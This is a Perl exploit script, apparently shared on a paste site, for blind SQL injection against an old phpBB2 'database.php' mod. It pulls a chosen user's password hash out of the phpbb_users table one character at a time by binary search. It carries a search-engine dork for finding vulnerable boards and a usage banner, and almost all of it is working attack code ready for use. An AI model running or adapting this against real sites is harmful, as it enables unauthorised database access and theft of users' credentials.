electron1x

1. #!/usr/bin/perl
2. use strict;
3. use warnings;
4.  
5. use LWP::UserAgent;
6. #
7. # phpBB2 database.php mod Remote (blind) SQL-Injection
8. # Note: its a very old mod, so i could not figure out the
9. # name of the mod,even the phpbb.de-administrator could
10. # not tell me the name of the mod, though they had the
11. # script on their server!
12. #
13. # Dork: database.php?dir_id
14. #
15.  
16.  
17.  
18. my $url = shift;
19. my $id = shift || usage();
20. my $keyspace = "0123456789abcdef";
21.  
22. # global vars... nasty eh ?
23. our @url = ( "$url/database.php?dir_id=7+OR+ASCII(SUBSTR((SELECT+user_password+FROM+phpbb_users+WHERE+user_id=$id),1,1))", '', '' );
24. our $regex = 'functions_database\.php';
25. our $ua = LWP::UserAgent->new;
26.  
27.  
28. $ua->agent('mozilla.. :D');
29. print "[~] Checking...\n";
30. my $r = $ua->get($url . "/database.php?dir_id='");
31. die "\t[!!] Couldnt connect to $url!\n" unless ( $r->is_success );
32. die "\t[!!] Target doesnt seem to be vulnerable!\n" unless ( $r->content =~ /Allgemeiner\ Fehler/ );
33.  
34. print "\t[*] Target seems to be vulnerable\n";
35.  
36.  
37. print "[~] Unleashing Black Magic...\n";
38. print STDERR "\t[*] Getting Hash: ";
39.  
40. for ( 1..32 ) {
41. $url[0] =~ s/\),[0-9]{1,2},/\),$_,/;
42. blind( build_array($keyspace), 0, 16);
43. }
44. print "\n";
45.  
46.  
47.  
48.  
49. sub usage {
50. print q
51. {-----------------------------------------
52. - phpBB 'database.php mod' -
53. - remote SQL-Injection -
54. -----------------------------------------
55. - written by electron1x -
56. - bug discovered by j0hn.x3r -
57. -----------------------------------------
58. - Usage -
59. - phpdb.pl <board> <user id> -
60. - Sample -
61. - phpdb.pl http://example.com/phbBB2/ 1 -
62. -----------------------------------------
63. - Dork -
64. - inurl:database.php?dir_id -
65. -----------------------------------------
66. };
67. exit(0);
68. }
69.  
70.  
71.  
72. sub blind
73. {
74. my ( $keyspace, $bottom, $top ) = @_;
75. my $center = int ($bottom+$top)/2;
76. print STDERR chr $$keyspace[$center];
77. if ( request($$keyspace[$center], '=')) {
78. return $center;
79. } elsif ( $top-$bottom > 0) {
80. print STDERR "\b";
81. return blind($keyspace, $center+1, $top )
82. unless ( request($$keyspace[$center], '<') );
83. return blind($keyspace, $bottom, $center-1);
84. } else {
85. print STDERR "[!!] Something went wront, dunno what..\n";
86. exit(1);
87. }
88. }
89.  
90. sub build_array {
91. my @sorted = sort {$a<=>$b} map {ord} $_[0] =~ /./g;
92. return \@sorted;
93. }
94.  
95.  
96. sub request {
97. my ( $key, $flag ) = @_;
98. my $r = $ua->get($url[0] . $flag . $url[1] . $key . $url[2]);
99. return ( $r->content =~ /$regex/ );
100. }
101.  
102. __END__
103.